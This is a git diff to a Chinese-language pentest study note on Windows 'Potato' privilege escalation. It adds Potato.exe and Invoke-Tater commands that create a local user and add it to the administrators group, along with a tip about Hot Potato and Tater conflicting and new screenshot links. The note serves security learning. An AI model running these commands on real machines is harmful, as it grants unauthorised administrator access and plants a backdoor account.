📝 土豆提权整理成功截图

--- a/docs/网络安全/端点安全/Windows/提权/土豆提权.md
+++ b/docs/网络安全/端点安全/Windows/提权/土豆提权.md
@@ -110,9 +110,17 @@ Potato.exe -ip [本机ip] -cmd "命令行（可执行程序路径）" -enable_ht
 
 ---
 
-> TODO: 需要一个成功利用的截图
+或者尝试新建一个用户:
 
-![image-20241212150813472](http://cdn.ayusummer233.top/DailyNotes/202412121508790.png)
+```cmd
+Potato.exe -ip 192.168.198.135 -disable_exhaust true -cmd "C:\Windows\System32\cmd.exe /K net user test 123.com /add && net localgroup administrators test /add"
+```
+
+![image-20241219014210236](http://cdn.ayusummer233.top/DailyNotes/202412190142338.png)
+
+![image-20241219014314907](http://cdn.ayusummer233.top/DailyNotes/202412190143970.png)
+
+![image-20241219014611399](http://cdn.ayusummer233.top/DailyNotes/202412190146440.png)
 
 ---
 
@@ -125,6 +133,8 @@ Potato.exe -ip [本机ip] -cmd "命令行（可执行程序路径）" -enable_ht
 ---
 
 ### 利用过程
+
+> 需要注意的是如果机子尝试了 Hotpotato 提权, 那么可能导致 Tater 这里提权失败
 
 Clone [Tater / Kevin-Robertson / Github](https://github.com/Kevin-Robertson/Tater) 到本地，打开 powershell 并 cd 到项目根目录， 或者单独把 `Tater.ps1` 取出来也是一样的
 
@@ -143,17 +153,13 @@ Import-Module ./Tater.ps1
 ```bash
 net localgroup administrators
 . .\Tater.ps1
-Invoke-Tater -Command "net localgroup administrators userTater1 /add"
+Invoke-Tater -Command "net user tatertest testpass /add && net localgroup administrators tatertest /add"
 net localgroup administrators
 ```
 
-![image-20241213171641088](http://cdn.ayusummer233.top/DailyNotes/202412131716224.png)
+![image-20241219022950977](http://cdn.ayusummer233.top/DailyNotes/202412190229047.png)
 
-![image-20241213172938788](http://cdn.ayusummer233.top/DailyNotes/202412131729861.png)
-
-![image-20241213173314156](http://cdn.ayusummer233.top/DailyNotes/202412131733228.png)
-
-![image-20241213173451830](http://cdn.ayusummer233.top/DailyNotes/202412131734921.png)
+![image-20241219023500296](http://cdn.ayusummer233.top/DailyNotes/202412190235347.png)
 
 ---
 
